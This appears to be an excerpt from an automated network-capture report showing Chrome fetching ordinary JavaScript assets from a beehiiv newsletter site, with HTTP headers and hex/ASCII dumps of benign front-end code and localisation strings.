                                                                                                                                            2025-01-15 18:14:40 UTC963INData Raw: 6e 74 68 22 3a 20 22 24 74 28 62 69 6c 6c 69 6e 67 2e 73 75 6d 6d 61 72 79 2e 69 6e 74 65 72 76 61 6c 73 2e 6d 6f 6e 74 68 29 22 2c 0a 20 20 20 20 20 20 20 20 22 79 65 61 72 22 3a 20 22 24 74 28 62 69 6c 6c 69 6e 67 2e 73 75 6d 6d 61 72 79 2e 69 6e 74 65 72 76 61 6c 73 2e 79 65 61 72 29 22 2c 0a 20 20 20 20 20 20 20 20 22 6f 6e 65 5f 74 69 6d 65 22 3a 20 22 24 74 28 62 69 6c 6c 69 6e 67 2e 73 75 6d 6d 61 72 79 2e 69 6e 74 65 72 76 61 6c 73 2e 6f 6e 65 5f 74 69 6d 65 29 22 0a 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 22 69 6e 74 65 72 76 61 6c 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6d 6f 6e 74 68 22 3a 20 22 24 74 28 75 70 67 72 61 64 65 2e 69 6e 74 65 72 76 61 6c 2e 6d 6f 6e 74 68 6c 79 29 22 2c 0a 20 20 20 20 20 20 20 20 22 79 65 61 72 22 3a 20
                                                                                                                                            Data Ascii: nth": "$t(billing.summary.intervals.month)", "year": "$t(billing.summary.intervals.year)", "one_time": "$t(billing.summary.intervals.one_time)" }, "intervals": { "month": "$t(upgrade.interval.monthly)", "year":
                                                                                                                                            2025-01-15 18:14:40 UTC1369INData Raw: 6c 61 62 6c 65 20 61 74 20 74 68 69 73 20 74 69 6d 65 22 2c 0a 20 20 20 20 20 20 22 74 6f 61 73 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 22 53 75 62 73 63 72 69 70 74 69 6f 6e 20 75 70 64 61 74 65 64 21 22 2c 0a 20 20 20 20 20 20 20 20 22 65 72 72 6f 72 22 3a 20 22 53 6f 6d 65 74 68 69 6e 67 20 77 65 6e 74 20 77 72 6f 6e 67 21 22 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 7d 2c 0a 20 20 22 61 63 63 6f 75 6e 74 5f 61 63 74 69 6f 6e 73 22 3a 20 7b 0a 20 20 20 20 22 64 6f 77 6e 67 72 61 64 65 22 3a 20 7b 0a 20 20 20 20 20 20 22 6c 6f 61 64 69 6e 67 22 3a 20 22 24 74 28 73 68 61 72 65 64 2e 61 63 74 69 6f 6e 73 2e 6c 6f 61 64 69 6e 67 29 22 2c 0a 20 20 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 63 6f 75 6e 74 20
                                                                                                                                            Data Ascii: lable at this time", "toast": { "success": "Subscription updated!", "error": "Something went wrong!" } } }, "account_actions": { "downgrade": { "loading": "$t(shared.actions.loading)", "title": "Account


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            147192.168.2.1649873104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:40 UTC557OUTGET /assets/TwitterEmbed-wIDCDAXa.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:40 UTC902INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:40 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 9596
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"257c-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8c6fb8643ec-EWR
                                                                                                                                            2025-01-15 18:14:40 UTC467INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 30 63 30 66 35 39 65 31 2d 63 61 35 64 2d 35 36 31 33 2d 39 62 33 61 2d 36 64 31 65 64 39 30 32 61 36 30 64 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="0c0f59e1-ca5d-5613-9b3a-6d1ed902a60d")}catch(
                                                                                                                                            2025-01-15 18:14:40 UTC1369INData Raw: 66 72 6f 6d 22 2e 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2d 4f 6a 32 78 4d 66 47 45 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 46 20 61 73 20 6a 7d 66 72 6f 6d 22 2e 2f 41 72 72 6f 77 4c 65 66 74 49 63 6f 6e 2d 44 7a 39 51 59 78 6e 30 2e 6a 73 22 3b 63 6f 6e 73 74 20 67 3d 7b 69 6e 74 65 72 3a 22 49 6e 74 65 72 22 2c 6c 69 62 72 65 5f 63 61 73 6c 6f 6e 5f 74 65 78 74 3a 22 4c 69 62 72 65 20 43 61 73 6c 6f 6e 20 54 65 78 74 22 2c 73 70 61 63 65 5f 6d 6f 6e 6f 3a 22 53 70 61 63 65 20 4d 6f 6e 6f 22 2c 71 75 69 63 6b 73 61 6e 64 3a 22 51 75 69 63 6b 73 61 6e 64 22 7d 2c 4e 3d 7b 69 6e 74 65 72 3a 7b 66 61 6d 69 6c 79 3a 22 49 6e 74 65 72 22 2c 76 61 72 69 61 6e 74 73 3a 5b 22 31 30 30 22 2c 22 32 30 30 22 2c 22 33 30 30 22 2c 22 72 65 67 75 6c 61 72 22 2c 22 35 30 30 22
                                                                                                                                            Data Ascii: from"./components-Oj2xMfGE.js";import{F as j}from"./ArrowLeftIcon-Dz9QYxn0.js";const g={inter:"Inter",libre_caslon_text:"Libre Caslon Text",space_mono:"Space Mono",quicksand:"Quicksand"},N={inter:{family:"Inter",variants:["100","200","300","regular","500"
                                                                                                                                            2025-01-15 18:14:40 UTC1369INData Raw: 68 72 69 62 32 42 67 2d 34 2e 74 74 66 22 7d 2c 63 61 74 65 67 6f 72 79 3a 22 73 61 6e 73 2d 73 65 72 69 66 22 2c 6b 69 6e 64 3a 22 77 65 62 66 6f 6e 74 73 23 77 65 62 66 6f 6e 74 22 2c 6d 65 6e 75 3a 22 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 69 6e 74 65 72 2f 76 31 32 2f 55 63 43 4f 33 46 77 72 4b 33 69 4c 54 65 48 75 53 5f 66 76 51 74 4d 77 43 70 35 30 4b 6e 4d 77 32 62 6f 4b 6f 64 75 4b 6d 4d 45 56 75 4c 79 66 41 5a 6c 68 6a 51 2e 74 74 66 22 7d 2c 6c 69 62 72 65 5f 63 61 73 6c 6f 6e 5f 74 65 78 74 3a 7b 66 61 6d 69 6c 79 3a 22 4c 69 62 72 65 20 43 61 73 6c 6f 6e 20 54 65 78 74 22 2c 76 61 72 69 61 6e 74 73 3a 5b 22 72 65 67 75 6c 61 72 22 2c 22 69 74 61 6c 69 63 22 2c 22 37 30 30 22 5d 2c 73 75 62 73 65 74 73
                                                                                                                                            Data Ascii: hrib2Bg-4.ttf"},category:"sans-serif",kind:"webfonts#webfont",menu:"http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuLyfAZlhjQ.ttf"},libre_caslon_text:{family:"Libre Caslon Text",variants:["regular","italic","700"],subsets
                                                                                                                                            2025-01-15 18:14:40 UTC1369INData Raw: 6e 64 2f 76 33 30 2f 36 78 4b 2d 64 53 5a 61 4d 39 69 45 38 4b 62 70 52 41 5f 4c 4a 33 7a 38 6d 48 39 42 4f 4a 76 67 6b 42 67 76 31 38 47 30 77 78 34 30 51 44 77 2e 74 74 66 22 7d 2c 63 61 74 65 67 6f 72 79 3a 22 73 61 6e 73 2d 73 65 72 69 66 22 2c 6b 69 6e 64 3a 22 77 65 62 66 6f 6e 74 73 23 77 65 62 66 6f 6e 74 22 2c 6d 65 6e 75 3a 22 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 71 75 69 63 6b 73 61 6e 64 2f 76 33 30 2f 36 78 4b 2d 64 53 5a 61 4d 39 69 45 38 4b 62 70 52 41 5f 4c 4a 33 7a 38 6d 48 39 42 4f 4a 76 67 6b 50 38 6f 35 38 43 2d 78 77 2e 74 74 66 22 7d 2c 73 70 61 63 65 5f 6d 6f 6e 6f 3a 7b 66 61 6d 69 6c 79 3a 22 53 70 61 63 65 20 4d 6f 6e 6f 22 2c 76 61 72 69 61 6e 74 73 3a 5b 22 72 65 67 75 6c 61 72 22 2c
                                                                                                                                            Data Ascii: nd/v30/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkBgv18G0wx40QDw.ttf"},category:"sans-serif",kind:"webfonts#webfont",menu:"http://fonts.gstatic.com/s/quicksand/v30/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkP8o58C-xw.ttf"},space_mono:{family:"Space Mono",variants:["regular",
                                                                                                                                            2025-01-15 18:14:40 UTC1369INData Raw: 73 74 72 69 6e 67 22 7c 7c 74 79 70 65 6f 66 20 6e 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 20 6e 3b 69 66 28 74 79 70 65 6f 66 20 6e 21 3d 22 6f 62 6a 65 63 74 22 29 72 65 74 75 72 6e 22 22 3b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6e 29 29 72 65 74 75 72 6e 20 73 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 6e 29 3b 69 66 28 6e 2e 74 6f 53 74 72 69 6e 67 21 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 26 26 21 6e 2e 74 6f 53 74 72 69 6e 67 2e 74 6f 53 74 72 69 6e 67 28 29 2e 69 6e 63 6c 75 64 65 73 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 29 72 65 74 75 72 6e 20 6e 2e 74 6f 53 74 72 69 6e 67 28 29 3b 76 61 72 20 72 3d 22 22 3b 66 6f 72 28 76 61 72 20 6c 20 69 6e 20 6e 29 69 2e 63 61 6c 6c 28 6e
                                                                                                                                            Data Ascii: string"||typeof n=="number")return n;if(typeof n!="object")return"";if(Array.isArray(n))return s.apply(null,n);if(n.toString!==Object.prototype.toString&&!n.toString.toString().includes("[native code]"))return n.toString();var r="";for(var l in n)i.call(n
                                                                                                                                            2025-01-15 18:14:40 UTC1369INData Raw: 6c 6f 72 2c 63 6f 6c 6f 72 3a 61 3f 2e 74 65 78 74 5f 63 6f 6c 6f 72 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 60 24 7b 74 3f 2e 62 75 74 74 6f 6e 5f 62 6f 72 64 65 72 5f 72 61 64 69 75 73 7c 7c 30 7d 70 78 60 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 6f 2e 6a 73 78 73 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 53 2c 63 68 69 6c 64 72 65 6e 3a 5b 61 3f 2e 73 68 6f 77 5f 69 6d 61 67 65 26 26 6d 26 26 6f 2e 6a 73 78 28 22 69 6d 67 22 2c 7b 73 72 63 3a 6d 2c 61 6c 74 3a 22 6c 6f 67 6f 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 55 2c 73 74 79 6c 65 3a 7b 62 6f 72 64 65 72 52 61 64 69 75 73 3a 60 24 7b 74 3f 2e 62 75 74 74 6f 6e 5f 62 6f 72 64 65 72 5f 72 61 64 69 75 73 7c 7c 30 7d 70 78 60 2c 6f 76 65 72 66 6c 6f 77 3a 22 68 69 64 64 65 6e 22 7d 7d 29 2c 6f 2e
                                                                                                                                            Data Ascii: lor,color:a?.text_color,borderRadius:`${t?.button_border_radius||0}px`},children:[o.jsxs("div",{className:S,children:[a?.show_image&&m&&o.jsx("img",{src:m,alt:"logo",className:U,style:{borderRadius:`${t?.button_border_radius||0}px`,overflow:"hidden"}}),o.
                                                                                                                                            2025-01-15 18:14:40 UTC1369INData Raw: 29 7d 7d 2c 5b 5d 29 2c 6f 2e 6a 73 78 73 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 6d 78 2d 61 75 74 6f 20 6d 62 2d 31 36 20 6d 61 78 2d 77 2d 78 6c 20 73 70 61 63 65 2d 79 2d 34 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 6f 2e 6a 73 78 28 4f 2c 7b 74 68 65 6d 65 3a 73 2e 74 68 65 6d 65 2c 75 72 6c 3a 63 2c 65 6c 65 6d 65 6e 74 3a 7b 74 79 70 65 3a 22 70 61 79 77 61 6c 6c 5f 62 72 65 61 6b 22 2c 61 74 74 72 73 3a 7b 69 64 3a 73 2e 69 64 2c 64 61 74 61 3a 7b 74 69 74 6c 65 3a 73 2e 74 69 74 6c 65 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 73 2e 64 65 73 63 72 69 70 74 69 6f 6e 2c 63 74 61 5f 74 65 78 74 3a 73 2e 63 74 61 5f 74 65 78 74 2c 62 65 6e 65 66 69 74 73 3a 73 2e 62 65 6e 65 66 69 74 73 2c 73 75 62 68 65 61 64 65 72 3a 73 2e 73 75 62 68 65 61
                                                                                                                                            Data Ascii: )}},[]),o.jsxs("div",{className:"mx-auto mb-16 max-w-xl space-y-4",children:[o.jsx(O,{theme:s.theme,url:c,element:{type:"paywall_break",attrs:{id:s.id,data:{title:s.title,description:s.description,cta_text:s.cta_text,benefits:s.benefits,subheader:s.subhea
                                                                                                                                            2025-01-15 18:14:40 UTC915INData Raw: 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 29 7d 7d 2c 5b 65 2c 69 5d 29 7d 2c 4a 3d 28 65 2c 69 29 3d 3e 7b 64 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 23 63 6f 6e 74 65 6e 74 2d 62 6c 6f 63 6b 73 22 29 3b 77 69 6e 64 6f 77 2e 74 77 74 74 72 3f 2e 77 69 64 67 65 74 73 3f 2e 6c 6f 61 64 28 73 29 7d 2c 5b 65 2c 69 5d 29 7d 2c 7a 3d 28 7b 68 74 6d 6c 3a 65 2c 73 6c 75 67 3a 69 2c 75 70 64 61 74 65 3a 73 3d 21 30 7d 29 3d 3e 28 47 28 69 2c 73 29 2c 4a 28 69 2c 73 29 2c 51 28 69 2c 73 29 2c 6f 2e 6a 73 78 28 22 64 69 76 22 2c 7b 73 75 70 70 72 65 73 73 48 79 64 72 61 74 69 6f 6e 57 61 72 6e 69 6e 67 3a 21 30 2c 64 61 6e 67 65 72 6f 75 73 6c 79 53 65 74 49
                                                                                                                                            Data Ascii: .removeChild(t)}},[e,i])},J=(e,i)=>{d.useEffect(()=>{const s=document.getElementById("#content-blocks");window.twttr?.widgets?.load(s)},[e,i])},z=({html:e,slug:i,update:s=!0})=>(G(i,s),J(i,s),Q(i,s),o.jsx("div",{suppressHydrationWarning:!0,dangerouslySetI


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            148192.168.2.1649875104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:40 UTC550OUTGET /assets/index-CCu-G_ty.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:40 UTC901INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:40 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1147
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"47b-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8c76fa77cff-EWR
                                                                                                                                            2025-01-15 18:14:40 UTC468INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 65 34 64 36 65 63 32 34 2d 63 62 61 36 2d 35 30 64 33 2d 38 36 62 63 2d 34 33 63 66 38 64 38 33 62 62 37 66 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="e4d6ec24-cba6-50d3-86bc-43cf8d83bb7f")}catch(
                                                                                                                                            2025-01-15 18:14:40 UTC679INData Raw: 68 65 6d 65 2e 74 65 78 74 5f 63 6f 6c 6f 72 7c 7c 22 22 3b 72 65 74 75 72 6e 20 65 2e 6a 73 78 28 22 75 6c 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 66 6c 65 78 20 66 6c 65 78 2d 77 72 61 70 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 32 20 74 65 78 74 2d 78 73 20 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 2c 63 68 69 6c 64 72 65 6e 3a 73 2e 6d 61 70 28 28 74 2c 72 29 3d 3e 65 2e 6a 73 78 28 61 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 65 2e 6a 73 78 73 28 22 6c 69 22 2c 7b 73 75 70 70 72 65 73 73 48 79 64 72 61 74 69 6f 6e 57 61 72 6e 69 6e 67 3a 21 30 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 66 6c 65 78 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 32 20 74 65 78 74 2d 77 74 2d 74 65 78 74 2d 6f 6e 2d 62 61 63 6b 67 72 6f
                                                                                                                                            Data Ascii: heme.text_color||"";return e.jsx("ul",{className:"flex flex-wrap items-center gap-2 text-xs font-semibold",children:s.map((t,r)=>e.jsx(a.Fragment,{children:e.jsxs("li",{suppressHydrationWarning:!0,className:"flex items-center gap-2 text-wt-text-on-backgro


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            149192.168.2.1649876104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:40 UTC550OUTGET /assets/index-D5Hq4kiz.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:40 UTC901INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:40 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 3385
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"d39-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8c78b1a1906-EWR
                                                                                                                                            2025-01-15 18:14:40 UTC468INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 31 38 61 65 30 38 33 35 2d 33 65 34 30 2d 35 64 64 32 2d 38 31 35 62 2d 33 63 31 31 31 63 34 62 64 33 39 63 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="18ae0835-3e40-5dd2-815b-3c111c4bd39c")}catch(
                                                                                                                                            2025-01-15 18:14:40 UTC1369INData Raw: 79 63 41 5f 41 46 4c 72 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 54 20 61 73 20 6d 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 42 64 70 41 50 70 64 4e 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 75 20 61 73 20 76 7d 66 72 6f 6d 22 2e 2f 75 73 65 54 72 61 6e 73 6c 61 74 69 6f 6e 2d 43 66 4b 4a 41 6d 47 59 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 4c 20 61 73 20 79 7d 66 72 6f 6d 22 2e 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2d 4f 6a 32 78 4d 66 47 45 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 46 20 61 73 20 4e 7d 66 72 6f 6d 22 2e 2f 53 70 61 72 6b 6c 65 73 49 63 6f 6e 2d 44 41 34 68 73 63 32 61 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 46 20 61 73 20 7a 7d 66 72 6f 6d 22 2e 2f 4c 6f 63 6b 43 6c 6f 73 65 64 49 63 6f 6e 2d 42 6c 75 6f 43 55 4d 49 2e 6a 73 22 3b 63 6f 6e 73 74 20 63 3d 28 7b 74 68
                                                                                                                                            Data Ascii: ycA_AFLr.js";import{T as m}from"./index-BdpAPpdN.js";import{u as v}from"./useTranslation-CfKJAmGY.js";import{L as y}from"./components-Oj2xMfGE.js";import{F as N}from"./SparklesIcon-DA4hsc2a.js";import{F as z}from"./LockClosedIcon-BluoCUMI.js";const c=({th
